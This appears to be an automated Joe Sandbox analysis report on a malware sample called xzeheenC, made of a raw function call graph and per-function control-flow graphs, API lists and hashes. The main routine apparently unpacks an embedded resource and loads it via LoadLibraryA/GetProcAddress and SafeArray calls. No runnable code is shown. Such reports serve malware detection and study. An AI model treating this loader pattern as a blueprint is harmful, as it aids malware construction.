52708->52707 52710 20a8beda 52709->52710 52712 1f6ee660 LdrInitializeThunk 52710->52712 52711 20a8bfd0 52711->52543 52712->52711 52714 20a8beda 52713->52714 52716 1f6ee660 LdrInitializeThunk 52714->52716 52715 20a8bfd0 52715->52543 52716->52715 52718 20a8c4a2 52717->52718 52720 1f6ee660 LdrInitializeThunk 52718->52720 52719 20a8c598 52719->52544 52720->52719 52722 20a8c4a2 52721->52722 52724 1f6ee660 LdrInitializeThunk 52722->52724 52723 20a8c598 52723->52544 52724->52723 52726 20a8ca6a 52725->52726 52728 1f6ee660 LdrInitializeThunk 52726->52728 52727 20a8cb60 52727->52545 52728->52727 52730 20a8ca6a 52729->52730 52732 1f6ee660 LdrInitializeThunk 52730->52732 52731 20a8cb60 52731->52545 52732->52731 52734 20a8d032 52733->52734 52736 1f6ee660 LdrInitializeThunk 52734->52736 52735 20a8d128 52735->52546 52736->52735 52738 20a8d032 52737->52738 52740 1f6ee660 LdrInitializeThunk 52738->52740 52739 20a8d128 52739->52546 52740->52739 52742 20a8d5fa 52741->52742 52744 1f6ee660 LdrInitializeThunk 52742->52744 52743 20a8d6f0 52743->52547 52744->52743 52746 20a8d5fa 52745->52746 52748 1f6ee660 LdrInitializeThunk 52746->52748 52747 20a8d6f0 52747->52547 52748->52747 52750 20a8dbc2 52749->52750 52752 1f6ee660 LdrInitializeThunk 52750->52752 52751 20a8dcb8 52751->52548 52752->52751 52754 20a8dbc2 52753->52754 52756 1f6ee660 LdrInitializeThunk 52754->52756 52755 20a8dcb8 52755->52548 52756->52755 52758 20a8e18a 52757->52758 52760 1f6ee660 LdrInitializeThunk 52758->52760 52759 20a8e280 52759->52549 52760->52759 52762 20a8e18a 52761->52762 52764 1f6ee660 LdrInitializeThunk 52762->52764 52763 20a8e280 52763->52549 52764->52763 52766 20a8e752 52765->52766 52768 1f6ee660 LdrInitializeThunk 52766->52768 52767 20a8e848 52767->52550 52768->52767 52770 20a8e752 52769->52770 52772 1f6ee660 LdrInitializeThunk 52770->52772 52771 20a8e848 52771->52550 52772->52771 52774 20a8ed1a 52773->52774 52776 1f6ee660 LdrInitializeThunk 52774->52776 52775 20a8ee10 52775->52551 52776->52775 52778 20a8ed1a 52777->52778 52780 1f6ee660 LdrInitializeThunk 52778->52780 52779 20a8ee10 52779->52551 52780->52779 52782 20a8f2e2 52781->52782 52784 1f6ee660 LdrInitializeThunk 52782->52784 52783 20a8f3d8 52783->52552 52784->52783 52786 20a8f2e2 52785->52786 52788 1f6ee660 LdrInitializeThunk 52786->52788 52787 20a8f3d8 52787->52552 52788->52787 52790 20a8f8aa 52789->52790 52792 1f6ee660 LdrInitializeThunk 52790->52792 52791 20a8f9a0 52791->52553 52792->52791 52794 20a8f8aa 52793->52794 52796 1f6ee660 LdrInitializeThunk 52794->52796 52795 20a8f9a0 52795->52553 52796->52795 52798 20aa0062 52797->52798 52800 1f6ee660 LdrInitializeThunk 52798->52800 52799 20aa0158 52799->52554 52800->52799 52802 20aa0062 52801->52802 52804 1f6ee660 LdrInitializeThunk 52802->52804 52803 20aa0158 52803->52554 52804->52803 52806 20aa062a 52805->52806 52808 1f6ee660 LdrInitializeThunk 52806->52808 52807 20aa0720 52807->52555 52808->52807 52810 20aa062a 52809->52810 52812 1f6ee660 LdrInitializeThunk 52810->52812 52811 20aa0720 52811->52555 52812->52811 52814 20aa0bf2 52813->52814 52816 1f6ee660 LdrInitializeThunk 52814->52816 52815 20aa0ce8 52815->52556 52816->52815 52818 20aa0bf2 52817->52818 52820 1f6ee660 LdrInitializeThunk 52818->52820 52819 20aa0ce8 52819->52556 52820->52819 52822 20aa11ba 52821->52822 52824 1f6ee660 LdrInitializeThunk 52822->52824 52823 20aa12b0 52823->52557 52824->52823 52826 20aa11ba 52825->52826 52828 1f6ee660 LdrInitializeThunk 52826->52828 52827 20aa12b0 52827->52557 52828->52827 52830 20aa1782 52829->52830 52832 1f6ee660 LdrInitializeThunk 52830->52832 52831 20aa1878 52831->52558 52832->52831 52834 20aa1782 52833->52834 52836 1f6ee660 LdrInitializeThunk 52834->52836 52835 20aa1878 52835->52558 52836->52835 52838 20aa7142 52837->52838 52840 1f6ee660 LdrInitializeThunk 52838->52840 52839 20aa7238 52839->52559 52840->52839 52842 20aa7142 52841->52842 52844 1f6ee660 LdrInitializeThunk 52842->52844 52843 20aa7238 52843->52559 52844->52843 52846 20aa7732 52845->52846 52848 1f6ee660 LdrInitializeThunk 52846->52848 52847 20aa7828 52847->52560 52848->52847 52850 20aa7732 52849->52850 52852 1f6ee660 LdrInitializeThunk 52850->52852 52851 20aa7828 52851->52560 52852->52851 52854 20aa7cd8 52853->52854 52856 1f6ee660 LdrInitializeThunk 52854->52856 52855 20aa7df0 52855->52561 52856->52855 52858 20aa7cfa 52857->52858 52860 1f6ee660 LdrInitializeThunk 52858->52860 52859 20aa7df0 52859->52561 52860->52859 52862 20aa82c2 52861->52862 52864 1f6ee660 LdrInitializeThunk 52862->52864 52863 20aa83b8 52863->52562 52864->52863 52866 20aa82c2 52865->52866 52868 1f6ee660 LdrInitializeThunk 52866->52868 52867 20aa83b8 52867->52562 52868->52867 52870 20aa888a 52869->52870 52872 1f6ee660 LdrInitializeThunk 52870->52872 52871 20aa8980 52871->52563 52872->52871 52874 20aa888a 52873->52874 52876 1f6ee660 LdrInitializeThunk 52874->52876 52875 20aa8980 52875->52563 52876->52875 52878 20aa8e52 52877->52878 52880 1f6ee660 LdrInitializeThunk 52878->52880 52879 20aa8f48 52879->52564 52880->52879 52882 20aa8e52 52881->52882 52884 1f6ee660 LdrInitializeThunk 52882->52884 52883 20aa8f48 52883->52564 52884->52883 52886 20aa941a 52885->52886 52888 1f6ee660 LdrInitializeThunk 52886->52888 52887 20aa9510 52887->52565 52888->52887 52890 20aa93f8 52889->52890 52892 1f6ee660 LdrInitializeThunk 52890->52892 52891 20aa9510 52891->52565 52892->52891 52894 20aa9a0a 52893->52894 52896 1f6ee660 LdrInitializeThunk 52894->52896 52895 20aa9b0a 52895->52566 52896->52895 52898 20aa9a0a 52897->52898 52900 1f6ee660 LdrInitializeThunk 52898->52900 52899 20aa9b0a 52899->52566 52900->52899 52902 20aa9fda 52901->52902 52904 1f6ee660 LdrInitializeThunk 52902->52904 52903 20aaa0d0 52903->52567 52904->52903 52906 20aa9fda 52905->52906 52908 1f6ee660 LdrInitializeThunk 52906->52908 52907 20aaa0d0 52907->52567 52908->52907 52910 20aaa5a2 52909->52910 52912 1f6ee660 LdrInitializeThunk 52910->52912 52911 20aaa698 52911->52568 52912->52911 52914 20aaa5a2 52913->52914 52916 1f6ee660 LdrInitializeThunk 52914->52916 52915 20aaa698 52915->52568 52916->52915 52918 20aaab6a 52917->52918 52920 1f6ee660 LdrInitializeThunk 52918->52920 52919 20aaac60 52919->52569 52920->52919 52922 20aaab6a 52921->52922 52924 1f6ee660 LdrInitializeThunk 52922->52924 52923 20aaac60 52923->52569 52924->52923 52926 20aab132 52925->52926 52928 1f6ee660 LdrInitializeThunk 52926->52928 52927 20aab228 52927->52570 52928->52927 52930 20aab132 52929->52930 52932 1f6ee660 LdrInitializeThunk 52930->52932 52931 20aab228 52931->52570 52932->52931 52934 20aab6fa 52933->52934 52936 1f6ee660 LdrInitializeThunk 52934->52936 52935 20aab7f0 52935->52571 52936->52935 52938 20aab6fa 52937->52938 52940 1f6ee660 LdrInitializeThunk 52938->52940 52939 20aab7f0 52939->52571 52940->52939 52942 20aabcc2 52941->52942 52944 1f6ee660 LdrInitializeThunk 52942->52944 52943 20aabdb8 52943->52572 52944->52943 52946 20aabcc2 52945->52946 52948 1f6ee660 LdrInitializeThunk 52946->52948 52947 20aabdb8 52947->52572 52948->52947 52950 20aac28a 52949->52950 52952 1f6ee660 LdrInitializeThunk 52950->52952 52951 20aac380 52951->52573 52952->52951 52954 20aac28a 52953->52954 52956 1f6ee660 LdrInitializeThunk 52954->52956 52955 20aac380 52955->52573 52956->52955 52958 20caed3f 52957->52958 52970 20cace08 52958->52970 52962 20caed00 52961->52962 52963 20caed2b 52961->52963 52964 20cace08 3 API calls 52963->52964 52965 1f6eac88 52964->52965 52969 1f6ee691 52966->52969 52967 1f6ee7f4 52967->52655 52968 1f6eebd9 LdrInitializeThunk 52968->52967 52969->52967 52969->52968 52971 20cace13 52970->52971 52974 20caee20 52971->52974 52973 20caf23e 52978 20caee2b 52974->52978 52975 20cafa8c 52976 20cafad9 52975->52976 52984 20d90dc0 52975->52984 52989 20d90db0 52975->52989 52977 20cafb34 52976->52977 52994 20d9a5b8 52976->52994 52998 20d9a5a8 52976->52998 52977->52973 52978->52975 52978->52977 53002 20caf1bc GetModuleHandleW GetModuleHandleW DispatchMessageW 52978->53002 52985 20d90de1 52984->52985 52986 20d90e05 52985->52986 53003 20d90f5f 52985->53003 53008 20d90f70 52985->53008 52986->52976 52990 20d90de1 52989->52990 52991 20d90e05 52990->52991 52992 20d90f5f 2 API calls 52990->52992 52993 20d90f70 2 API calls 52990->52993 52991->52976 52992->52991 52993->52991 52996 20d9a61d 52994->52996 52995 20d9a66a 52995->52977 52996->52995 53125 20d994cc 52996->53125 52999 20d9a61d 52998->52999 53000 20d994cc DispatchMessageW 52999->53000 53001 20d9a66a 52999->53001 53000->52999 53001->52977 53004 20d90f7d 53003->53004 53005 20d90fb6 53004->53005 53013 20d90fc9 53004->53013 53019 20d90fd8 53004->53019 53005->52986 53009 20d90f7d 53008->53009 53010 20d90fb6 53009->53010 53011 20d90fc9 2 API calls 53009->53011 53012 20d90fd8 2 API calls 53009->53012 53010->52986 53011->53010 53012->53010 53014 20d91000 53013->53014 53015 20d91028 53014->53015 53025 20d91088 53014->53025 53033 20d910d4 53014->53033 53042 20d91070 53014->53042 53020 20d91000 53019->53020 53021 20d91028 53020->53021 53022 20d91088 2 API calls 53020->53022 53023 20d91070 2 API calls 53020->53023 53024 20d910d4 2 API calls 53020->53024 53021->53021 53022->53021 53023->53021 53024->53021 53026 20d91092 53025->53026 53050 20d92181 53026->53050 53054 20d92190 53026->53054 53027 20d91097 53058 20d95db8 53027->53058 53067 20d95dd0 53027->53067 53028 20d910d1 53028->53015 53034 20d91092 53033->53034 53035 20d910e2 53033->53035 53037 20d92181 2 API calls 53034->53037 53038 20d92190 2 API calls 53034->53038 53036 20d910d1 53036->53015 53039 20d91097 53037->53039 53038->53039 53040 20d95db8 2 API calls 53039->53040 53041 20d95dd0 2 API calls 53039->53041 53040->53036 53041->53036 53043 20d91092 53042->53043 53048 20d92181 2 API calls 53043->53048 53049 20d92190 2 API calls 53043->53049 53044 20d91097 53046 20d95db8 2 API calls 53044->53046 53047 20d95dd0 2 API calls 53044->53047 53045 20d910d1 53045->53015 53046->53045 53047->53045 53048->53044 53049->53044 53053 20d921c0 53050->53053 53051 20d92498 53051->53027 53052 20d90dc0 2 API calls 53052->53051 53053->53051 53053->53052 53055 20d921c0 53054->53055 53056 20d92498 53055->53056 53057 20d90dc0 2 API calls 53055->53057 53056->53027 53057->53056 53060 20d95f01 53058->53060 53061 20d95e01 53058->53061 53059 20d95e0d 53059->53028 53060->53028 53061->53059 53076 20d96048 53061->53076 53079 20d96047 53061->53079 53062 20d95e4d 53082 20ca8668 53062->53082 53092 20ca8678 53062->53092 53069 20d95e01 53067->53069 53071 20d95f01 53067->53071 53068 20d95e0d 53068->53028 53069->53068 53072 20d96048 2 API calls 53069->53072 53073 20d96047 2 API calls 53069->53073 53070 20d95e4d 53074 20ca8668 GetModuleHandleW 53070->53074 53075 20ca8678 GetModuleHandleW 53070->53075 53071->53028 53072->53070 53073->53070 53074->53071 53075->53071 53102 20d96078 53076->53102 53077 20d96052 53077->53062 53080 20d96052 53079->53080 53081 20d96078 2 API calls 53079->53081 53080->53062 53081->53080 53083 20ca8678 53082->53083 53109 20ca7b2c 53083->53109 53086 20ca8726 53088 20ca8752 53086->53088 53121 20ca7b3c 53086->53121 53090 20ca7b2c GetModuleHandleW 53090->53086 53093 20ca86a3 53092->53093 53094 20ca7b2c GetModuleHandleW 53093->53094 53095 20ca870a 53094->53095 53099 20ca8b98 GetModuleHandleW 53095->53099 53100 20ca7b2c GetModuleHandleW 53095->53100 53101 20ca8c31 GetModuleHandleW 53095->53101 53096 20ca8726 53097 20ca7b3c GetModuleHandleW 53096->53097 53098 20ca8752 53096->53098 53097->53098 53099->53096 53100->53096 53101->53096 53103 20d9607d 53102->53103 53105 20d960b4 53103->53105 53106 20ca94e9 GetModuleHandleW 53103->53106 53107 20ca7b3c GetModuleHandleW 53103->53107 53104 20d960a4 53104->53105 53108 20d96078 GetModuleHandleW GetModuleHandleW 53104->53108 53105->53077 53106->53104 53107->53104 53108->53105 53110 20ca7b37 53109->53110 53111 20ca870a 53110->53111 53112 20ca8da0 GetModuleHandleW 53110->53112 53111->53090 53113 20ca8b98 53111->53113 53117 20ca8c31 53111->53117 53112->53111 53114 20ca8ba8 53113->53114 53115 20ca8bb3 53114->53115 53116 20ca8da0 GetModuleHandleW 53114->53116 53115->53086 53116->53115 53118 20ca8c6d 53117->53118 53119 20ca8cee 53118->53119 53120 20ca8da0 GetModuleHandleW 53118->53120 53120->53119 53122 20ca94f0 GetModuleHandleW 53121->53122 53124 20ca9594 53122->53124 53124->53088 53126 20d9b768 DispatchMessageW 53125->53126 53127 20d9b7f5 53126->53127 53127->52996

                                                                                                                        Executed Functions

                                                                                                                        Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 34->35 36 401cd6-401cd8 34->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->34 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 84 401da5-401da7 78->84 82 401d8a-401d90 79->82 83 401d9c-401d9e 79->83 82->78 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 1b1ad01d 122->152 153 40234e call 1b1ad006 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 154 402390 call 1b1ad01d 135->154 155 402390 call 1b1ad006 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                                                                                        APIs
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                        • API String ID: 1430744539-2962942730
                                                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                        Function 20A82C08 Relevance: 4.3, Strings: 1, Instructions: 3071COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: N
                                                                                                                        • API String ID: 0-1130791706
                                                                                                                        • Opcode ID: 8d6879db4ba50ce060c2a352c329529884798f746f0573056a30ec4f00b9f17d
                                                                                                                        • Instruction ID: 66d872d24aceb9c4578019041492910ba8dcee2698352033ba38f5190c4681f6
                                                                                                                        • Opcode Fuzzy Hash: 8d6879db4ba50ce060c2a352c329529884798f746f0573056a30ec4f00b9f17d
                                                                                                                        • Instruction Fuzzy Hash: 2373E731D1075A8ECB11EFA8C854AADF7B1FF99300F51D69AE44867221EB70AAD4CF41
                                                                                                                        Function 20AA4597 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 975 20aa4597 976 20aa45e7-20aa460a call 20aa3f20 975->976 977 20aa45f5 975->977 991 20aa4614-20aa4635 call 20aa4378 976->991 978 20aa4662-20aa46cf call 20aa4ee8 977->978 979 20aa45f7-20aa45fb 977->979 994 20aa46d5-20aa4727 978->994 981 20aa465e 979->981 982 20aa45fd 979->982 981->978 982->976 985 20aa45fe-20aa460a 982->985 985->991 1000 20aa472d-20aa48b0 994->1000 1001 20aa4e67-20aa4ecb 994->1001 1015 20aa491c-20aa4936 1000->1015 1017 20aa493c-20aa4964 1015->1017 1018 20aa48b2-20aa48cb 1015->1018 1027 20aa497f 1017->1027 1028 20aa4966-20aa497e 1017->1028 1022 20aa48cd-20aa48d9 1018->1022 1023 20aa48f5 1018->1023 1024 20aa48db-20aa48e1 1022->1024 1025 20aa48e3-20aa48e9 1022->1025 1026 20aa48fb-20aa491b 1023->1026 1029 20aa48f3 1024->1029 1025->1029 1026->1015 1031 20aa4980 1027->1031 1028->1027 1029->1026 1031->1031
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq$PH]q$PH]q
                                                                                                                        • API String ID: 0-511712173
                                                                                                                        • Opcode ID: dc323609cae17c8eef28f12fb62bb683c74cc63290eb50aa650b596b30723017
                                                                                                                        • Instruction ID: 28ef7c9e7042d4645a96b1b8beed982d6a6d88387d9856a5227b37a301d2cf94
                                                                                                                        • Opcode Fuzzy Hash: dc323609cae17c8eef28f12fb62bb683c74cc63290eb50aa650b596b30723017
                                                                                                                        • Instruction Fuzzy Hash: 0C919575E012288FDB68DF69C994B9DBBB2BF89200F1081EAD90DA7355DB305E85CF11
                                                                                                                        Function 20A87138 Relevance: 2.3, Instructions: 2263COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4bf9b159dc0a53f00403f86e46917e07da34d863bc69f457f8f9e94af9fcac5c
                                                                                                                        • Instruction ID: e838cb1f89e4447f01020752a026af3086d51e90c552dd227375b73c1af13871
                                                                                                                        • Opcode Fuzzy Hash: 4bf9b159dc0a53f00403f86e46917e07da34d863bc69f457f8f9e94af9fcac5c
                                                                                                                        • Instruction Fuzzy Hash: E133D531C146198EDB11EFA8C854ADDFBB1FF99300F50D69AE45867221EB70AAD4CF81
                                                                                                                        Function 1F6EE660 Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3472370573.000000001F6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F6E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1f6e0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f6c39637dafb5566065cbe239e37b5c5e6e0543c77f95f2e069560cab90769b
                                                                                                                        • Instruction ID: 1814f49e72daf03c39f7b864008d7603f4fa4eed10f63aa011d7f25c4ce114aa
                                                                                                                        • Opcode Fuzzy Hash: 2f6c39637dafb5566065cbe239e37b5c5e6e0543c77f95f2e069560cab90769b
                                                                                                                        • Instruction Fuzzy Hash: 3002D475E01218CFDB54CFA9D884B9DBBB2BF48304F51C1A9D809AB356DB34AA85CF50
                                                                                                                        Function 20AA1D28 Relevance: .8, Instructions: 801COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 33d193a92083fccf44e1e66662e7ca9ba7dd95885f631016e9a4241b9743c4fe
                                                                                                                        • Instruction ID: 8305a2456752e6592d9e7ecd7fac8d0d89264d5f1f6aead00f8f590e1aee9980
                                                                                                                        • Opcode Fuzzy Hash: 33d193a92083fccf44e1e66662e7ca9ba7dd95885f631016e9a4241b9743c4fe
                                                                                                                        • Instruction Fuzzy Hash: 4E926C74E012298FDB64DF69CD98B9DBBB2BF89300F1081E9944DA7261DB346E81CF51
                                                                                                                        Function 20AA62B0 Relevance: .7, Instructions: 740COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e58792f7e16d6cf8ea49a3e15125078ca51cfa42947e057521fbdd9bf84d0099
                                                                                                                        • Instruction ID: d01cf8bf0564ccbfa3f36447e68917f31da0d3c85c1dba4f246c84778a4971b9
                                                                                                                        • Opcode Fuzzy Hash: e58792f7e16d6cf8ea49a3e15125078ca51cfa42947e057521fbdd9bf84d0099
                                                                                                                        • Instruction Fuzzy Hash: 8A826A74E012298FDB65DF69CD94BDABBB2BF88300F1081E9944DA7261DB316E81CF51
                                                                                                                        Function 20AA5480 Relevance: .7, Instructions: 728COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5ceabb8ac8d083878f15646c2bd81ee757156a7794c49b86699f39df7e678029
                                                                                                                        • Instruction ID: 1b78731166ebe1dabe43281ef7401bac382090d636337b46281573b7341ef9df
                                                                                                                        • Opcode Fuzzy Hash: 5ceabb8ac8d083878f15646c2bd81ee757156a7794c49b86699f39df7e678029
                                                                                                                        • Instruction Fuzzy Hash: 2B826A74E012298FDB64DF69CD94BDEBBB2AF89300F1081E9944DA7261DB346E81CF51
                                                                                                                        Function 20AA99E8 Relevance: .3, Instructions: 321COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd41c37c84da1d9154910d2dd8127dd471144730dee90536cda1190c4ba96c42
                                                                                                                        • Instruction ID: b30c9231e9ba8417c38971f16c8ebaa3519a0b4221fdbf65767bd3874c76061f
                                                                                                                        • Opcode Fuzzy Hash: bd41c37c84da1d9154910d2dd8127dd471144730dee90536cda1190c4ba96c42
                                                                                                                        • Instruction Fuzzy Hash: 14F1AC75E01228CFDB64DFA9C984B9DBBB2BF88300F5081AAD409A7291DB355E85CF50
                                                                                                                        Function 20A8F888 Relevance: .3, Instructions: 319COMMON
